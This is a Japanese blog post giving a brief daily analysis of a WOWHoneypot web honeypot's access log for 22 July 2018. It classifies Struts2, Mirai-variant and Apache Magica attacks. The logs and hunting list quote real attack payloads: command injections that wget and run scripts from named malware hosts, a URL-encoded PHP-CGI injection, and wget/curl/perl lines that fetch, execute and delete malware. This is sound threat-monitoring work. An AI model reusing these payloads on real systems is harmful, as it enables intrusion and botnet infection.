WOWHoneypotの簡易分析(49日目)
うっかりしていたことに、前日分の分析を怠っていたようです…。
日付前後しますが、分析します。
WOWhoneypotの2018/07/22(日) (運用49日目)の簡易分析です
総アクセス件数は 76件です。以下が全アクセスログです。
24 2018-07-22 GET /
4 2018-07-22 GET /index.action
2 2018-07-22 POST /qq.php
2 2018-07-22 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://g.mariokartayy[.]com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$
1 2018-07-22 PROPFIND /
1 2018-07-22 POST /zuoshou.php
1 2018-07-22 POST /yao.php
1 2018-07-22 POST /xx.php
1 2018-07-22 POST /xw.php
1 2018-07-22 POST /xw1.php
1 2018-07-22 POST /xshell.php
1 2018-07-22 POST /xiao.php
1 2018-07-22 POST /xiaoma.php
1 2018-07-22 POST /wuwu11.php
1 2018-07-22 POST /wshell.php
1 2018-07-22 POST /w.php
1 2018-07-22 POST /weixiao.php
1 2018-07-22 POST /webslee.php
1 2018-07-22 POST /wc.php
1 2018-07-22 POST /system.php
1 2018-07-22 POST /s.php
1 2018-07-22 POST /sheep.php
1 2018-07-22 POST /q.php
1 2018-07-22 POST /phpstudy.php
1 2018-07-22 POST /pe.php
1 2018-07-22 POST /mx.php
1 2018-07-22 POST /log.php
1 2018-07-22 POST /lindex.php
1 2018-07-22 POST /hm.php
1 2018-07-22 POST /feixiang.php
1 2018-07-22 POST /fack.php
1 2018-07-22 POST /defect.php
1 2018-07-22 POST /db_session.init.php
1 2018-07-22 POST /db.init.php
1 2018-07-22 POST /db__.init.php
1 2018-07-22 POST /data.php
1 2018-07-22 POST /conflg.php
1 2018-07-22 POST /cmd.php
1 2018-07-22 POST /cainiao.php
1 2018-07-22 POST /aotu.php
1 2018-07-22 POST /angge.php
1 2018-07-22 POST /ak47.php
1 2018-07-22 POST /9678.php
1 2018-07-22 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-22 HEAD /
1 2018-07-22 GET /x
1 2018-07-22 GET /webdav/
1 2018-07-22 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
phpMyAdmin関連(0件)とphpへのPOST(40件)と/を除外したアクセス数です。
4 2018-07-22 GET /index.action
2 2018-07-22 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$
1 2018-07-22 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-22 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-22 GET /webdav/
1 2018-07-22 GET /x
攻撃のログとしては、上から順に
・Struts2の脆弱性への攻撃
・Mirai亜種Gemini
・Apache Magicaの攻撃
・Mirai亜種Shinoa
・WebDAVに対する調査行為
・不明
です。
ハンティングログは以下です。上から2つがMirai亜種、その下3つがStruts2、最後がApache Magicaです。
2 2018-07-22 wget hxxp://g.mariokartayy.com/x
1 2018-07-22 wget hxxp://185.62.190.191/r
1 2018-07-22 wget -c hxxp://23.249.162.123:9998/se1
1 2018-07-22 wget -c hxxp://aaa.linuxa.club:57843/linux
1 2018-07-22 wget -P /tmp hxxp://hfs.mhacker.cc:9278/Linux.server
1 2018-07-22 wget -c -q hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr
以上です。
